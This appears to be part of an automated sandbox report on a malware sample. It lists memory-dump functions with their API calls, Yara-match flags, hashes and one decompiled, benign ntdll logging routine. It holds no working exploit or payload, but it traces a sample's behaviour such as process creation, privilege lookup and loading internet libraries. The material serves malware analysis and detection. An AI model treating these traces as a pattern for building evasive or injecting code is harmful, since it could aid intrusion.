                                                                              • Opcode ID: a6d6b8c5f459265d809a12f77a38178abd1ddc8febd638e9293d8eadbf3ba7ca
                                                                              • Instruction ID: e04a9ae76e073f71967c26d00bdeef5c4828c0c408723128754848ae8f552176
                                                                              • Opcode Fuzzy Hash: a6d6b8c5f459265d809a12f77a38178abd1ddc8febd638e9293d8eadbf3ba7ca
                                                                              • Instruction Fuzzy Hash: 519002F120100503F141755944057460019D7D0345F51C011A9055559E9699DDD576A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 046499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 66a12dcadf3521f0096f42c0e0fee863b1c4e7803f3e0341b80213e6bd1ec29b
                                                                              • Instruction ID: 24486741d171a67ba959bbf26b8fdb21c1002a2a042456b43b629fce3430b437
                                                                              • Opcode Fuzzy Hash: 66a12dcadf3521f0096f42c0e0fee863b1c4e7803f3e0341b80213e6bd1ec29b
                                                                              • Instruction Fuzzy Hash: 319002E134100543F10165594415B060019D7E1345F51C015E5055559D9659DC927166
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 04649A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 11c2b7e862cd181b4db13dbf52209e8b5676bd64d8dd31549ce7da0460bb34c8
                                                                              • Instruction ID: 237eea2a4491225977ff3a910fc53927bbd844d98cdb97bfdc884d6d725d7315
                                                                              • Opcode Fuzzy Hash: 11c2b7e862cd181b4db13dbf52209e8b5676bd64d8dd31549ce7da0460bb34c8
                                                                              • Instruction Fuzzy Hash: 5C9002A121180143F20169694C15B070019D7D0347F51C115A4145559CD955D8A16561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB6ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000007D0), ref: 02BB6F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
                                                                              • Instruction ID: 6bf55003886b50e6c1ebc7575bed658fbe5108997e4a9a0e3240e25b2c7ba6da
                                                                              • Opcode Fuzzy Hash: b68cd7a2022293f8b0ae9faa7826afc8d8a1f6c3102b37f9d1d84b4608bdc5e0
                                                                              • Instruction Fuzzy Hash: 673170B5641704ABC716DFA4C8A4FABB7B9EF48700F04845DF61A5B240D7B0B945CBE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB6EC7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000007D0), ref: 02BB6F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: net.dll$wininet.dll
                                                                              • API String ID: 3472027048-1269752229
                                                                              • Opcode ID: 66d72b2b44c209b42a32ca1814a6a74227a71274750b4abf3ecfef2e3bb21ee4
                                                                              • Instruction ID: ee84d8fdf68091392de69056fc44b0ee1dfbd57451c98f0094d3ab94a98937d7
                                                                              • Opcode Fuzzy Hash: 66d72b2b44c209b42a32ca1814a6a74227a71274750b4abf3ecfef2e3bb21ee4
                                                                              • Instruction Fuzzy Hash: AA3181B5545604ABCB11DFA4C8A5FAABBB9EF48700F14805DF6196B241D3B0A845CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB84B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02BA3B93), ref: 02BB84ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              • Opcode ID: 748594d3e6e12f22c9b1014ccf7ef959ffeacd37c5f8fb21e392075ca47dd746
                                                                              • Instruction ID: e8c534719231af60dcb01fc6b24f72d027b76d545fb416daa1c9d366e8c9ae85
                                                                              • Opcode Fuzzy Hash: 748594d3e6e12f22c9b1014ccf7ef959ffeacd37c5f8fb21e392075ca47dd746
                                                                              • Instruction Fuzzy Hash: 69E092712102146BD718EF58DC85EE777ADEF88760F108A85FE0D5B241C970ED118AE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02BA3B93), ref: 02BB84ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                              • Instruction ID: 90b9102a9db9cc6980c9897f69055365a911bed49d4fd8d0012a3fb8fa4bec60
                                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                              • Instruction Fuzzy Hash: E8E01AB12002046BDB14DF59CC44EE777ADAF88750F014559BA0857251C630E9108AF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BA7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02BA72BA
                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02BA72DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                              • Instruction ID: 4ff89aaff8798b4d831fbd5fae47c1ca4590b759917cfe7a2caa805465f05625
                                                                              • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                                              • Instruction Fuzzy Hash: BE01A731A8472876EB21A6949C42FFE776C9F01B50F140595FF04BA1C1E6E479064AF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BA9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02BA9B82
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction ID: d0c752699066f53729c2d53e8d5fb215323744223caa7d3dd30105debe8c7682
                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction Fuzzy Hash: 05010CB5D4020DABDF10EAA4DC41FEEB3B99F54308F0081D5A90897240F671EB54CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB852E, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02BB8584
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 8e4d3f649a18802cb4debfef868fee7beff59981d6ad1a88c7ac0c47c217010b
                                                                              • Instruction ID: 94b81aa192e530a62302f64f7f21cdf261f35acfa6c9947e321208a0b82b8b30
                                                                              • Opcode Fuzzy Hash: 8e4d3f649a18802cb4debfef868fee7beff59981d6ad1a88c7ac0c47c217010b
                                                                              • Instruction Fuzzy Hash: 340192B2200108AFCB54CF99DC80EEB77A9AF8C354F158258BA0D97250CA30E851CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02BB8584
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction ID: d1f6e37932fbb2e75969e2505243d5f5b2940a7719db54c1c952c6e8da88bf98
                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction Fuzzy Hash: 08015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB7000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02BACCC0,?,?), ref: 02BB703C
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                              • Instruction ID: b2391ff39e9c7d2884245a237f30d38bcf4c5866de3e797f8866eb9d400b380d
                                                                              • Opcode Fuzzy Hash: c3e563e220a415f9e67350fe2ce3a483144250edd434558a5de71cd5c41fe235
                                                                              • Instruction Fuzzy Hash: E1E06D333802043AE2316599AC02FE7B29DCB85B20F540066FA0DEA2C0D9D5F80146A4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB8611, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02BACF92,02BACF92,?,00000000,?,?), ref: 02BB8650
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: b7d7bd2bd5890dc774dbbe79e3763a03e5a3a33b226e43db48543f46a19fdde8
                                                                              • Instruction ID: 36a8d7aed9c8ae8582e34445f2be2d13c79e08fff8dda27da0ad8f4d51b1e273
                                                                              • Opcode Fuzzy Hash: b7d7bd2bd5890dc774dbbe79e3763a03e5a3a33b226e43db48543f46a19fdde8
                                                                              • Instruction Fuzzy Hash: 80F039B1600204AFDB14DF54CCC4EEB37AAEF99310F1185A9F90D9B252DA35A8168BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02BACF92,02BACF92,?,00000000,?,?), ref: 02BB8650
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction ID: abdd1933fc4eeea169f1d9b2bef95a58df758e9bab4d1397897c92af048e4e7a
                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                              • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC84EEB37ADAF88650F018555BA0857241C930E8108BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BB8480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(02BB3506,?,02BB3C7F,02BB3C7F,?,02BB3506,?,?,?,?,?,00000000,00000000,?), ref: 02BB84AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction ID: 2ba3532a3141218e176aad53370b463f27471cdf6abb92fb4248403dca48ee73
                                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                              • Instruction Fuzzy Hash: D1E012B1200208ABDB14EF99CC80EEB77ADAF88650F118599BA085B241CA30F9108AF0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BAD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02BA7C63,?), ref: 02BAD42B
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                              • Instruction ID: 9ffdf387f88f78f5a54185e3e02e584eefeff701ebbbe8acb50f4659f4f71195
                                                                              • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                              • Instruction Fuzzy Hash: CCD0A7757903043BE610FEA49C03F6632CD9B48B04F4940A4F948D73C3DE60F4004571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 02BAD3FE, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02BA7C63,?), ref: 02BAD42B
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: c729179f8b6f1661c442984c0238062cb98c8916debb2e7f0aff21fb2a29972b
                                                                              • Instruction ID: 9e4f683e6be229beb92bac61f36c47f3a3a857d5451ed67fdc43487c4126a9ac
                                                                              • Opcode Fuzzy Hash: c729179f8b6f1661c442984c0238062cb98c8916debb2e7f0aff21fb2a29972b
                                                                              • Instruction Fuzzy Hash: FED0A7757803013AE610EFA49D02F6632869B45704F0D40A5F54CEA3C3DA60E0004520
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0464967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2283edae011e033a5d2807ed068e0d8d111ca24eedc0fd525b8b183dcdbd9e1c
                                                                              • Instruction ID: f1663a01ee27faf67ca5d9dccfda07e86f19c6f4371ee49c321067a3c1fc0227
                                                                              • Opcode Fuzzy Hash: 2283edae011e033a5d2807ed068e0d8d111ca24eedc0fd525b8b183dcdbd9e1c
                                                                              • Instruction Fuzzy Hash: 45B02BF19420C1C6FB01DB7006087173900B7D0300F12C011D1020241A0338D0C0F1B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 0469FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E0469FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0464CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04695720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04695720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                              0x0469fdda
                                                                              0x0469fde2
                                                                              0x0469fde5
                                                                              0x0469fdec
                                                                              0x0469fdfa
                                                                              0x0469fdff
                                                                              0x0469fe0a
                                                                              0x0469fe0f
                                                                              0x0469fe17
                                                                              0x0469fe1e
                                                                              0x0469fe19
                                                                              0x0469fe19
                                                                              0x0469fe19
                                                                              0x0469fe20
                                                                              0x0469fe21
                                                                              0x0469fe22
                                                                              0x0469fe25
                                                                              0x0469fe40

                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469FDFA
                                                                              Strings
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0469FE2B
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0469FE01
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
                                                                              • Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp Download File
                                                                              • Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 6ff148161b634d82ea87d09b9308b3538aa84cabd0b295fec58a701324ddd139
                                                                              • Instruction ID: 7280948127e90eb35be6e3daff5e1122b48358612c33ce7341ff6e9fa6833c90
                                                                              • Opcode Fuzzy Hash: 6ff148161b634d82ea87d09b9308b3538aa84cabd0b295fec58a701324ddd139
                                                                              • Instruction Fuzzy Hash: 33F0C272240201BBEA251A45DC06E23BB9EEB44730F150218F6289A1D1FAA2BD2196A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%